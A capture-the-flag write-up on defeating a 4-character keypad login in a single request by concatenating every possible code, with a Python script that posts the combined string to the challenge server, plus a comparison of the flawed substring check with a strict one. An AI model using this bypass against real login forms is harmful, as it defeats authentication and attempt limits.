/ctfs/davincictf - 2021/scripting/digital code

Synopsis

We are going to crack a digital code... BUT without brute force?!




The environment

We need to log in. To do so, we have access to a Korean digipad with 10 different characters...


The code is only 4 digits long, so without a brute-force limit we could have cracked it easily, but this time there must be another way...


No need to BF

Here is the normal request in Burp:


And here is another request in Burp with a lot more characters (these are the 10 Korean characters, URL-encoded and repeated):


We can see that there is no error message, so maybe all the sequences of 4 Korean characters are tested. Assuming that, we just need to craft one big request containing all the possibilities.
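The behaviour inferred above, next to a check that would reject the oversized request. This is an added example, not the challenge's server code; the alphabet, the secret and the function names `weak_check`, `strict_check` and `all_codes_joined` are constructed assumptions, since the page shows neither the real characters nor the server side.

```python
import hmac
from itertools import product

# Constructed stand-ins: the page does not list the keypad's 10 characters
# or the real code, so both values below are assumptions.
ALPHABET = "가나다라마바사아자차"
SECRET = "다자가바"
CODE_LEN = 4


def weak_check(submitted: str) -> bool:
    """Assumed server behaviour: accept if the code appears anywhere in the input."""
    return SECRET in submitted


def strict_check(submitted: str) -> bool:
    """Hardened form: exact length first, then a constant-time comparison."""
    if len(submitted) != CODE_LEN:
        return False
    # compare_digest rejects non-ASCII str, so compare the UTF-8 bytes.
    return hmac.compare_digest(submitted.encode("utf-8"), SECRET.encode("utf-8"))


def all_codes_joined() -> str:
    """Every 4-character code over ALPHABET, concatenated as in the write-up."""
    return "".join("".join(p) for p in product(ALPHABET, repeat=CODE_LEN))


if __name__ == "__main__":
    blob = all_codes_joined()
    # One oversized submission: accepted by the weak check, rejected by the strict one.
    print(len(blob), weak_check(blob), strict_check(blob))
    # A genuine 4-character submission passes both.
    print(weak_check(SECRET), strict_check(SECRET))
```

With the strict check in place, each request tests exactly one code, so a per-account or per-IP attempt limit actually bounds guessing.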

Creating all the possibilities

I use my own tool to do so, but I guess crunch would have done the job too.


Here is the list:

Get the flag

#!/usr/bin/env python3

import requests
import urllib3


# Silence urllib3 warnings (requests.packages.urllib3 is the same module, so one call is enough)
urllib3.disable_warnings()

URL="http://challs.dvc.tf:2020"
TITLE="*** get code @Fey ***\n"

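def get_codes():
    # Read the generated list of codes, one entry per line
    with open("codes.txt", encoding="utf-8") as f:
        return f.read().splitlines()

def send_codes(codes):
    # Send every candidate at once as the single "code" form field
    payload = {"code": codes}
    rep = requests.post(url=URL, data=payload)
    return rep

if __name__ == "__main__":
    c_list = get_codes()
    # Concatenate all candidates into one long string
    CODES = "".join(c_list)
    resp = send_codes(CODES)
    print(resp.text)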

And finally...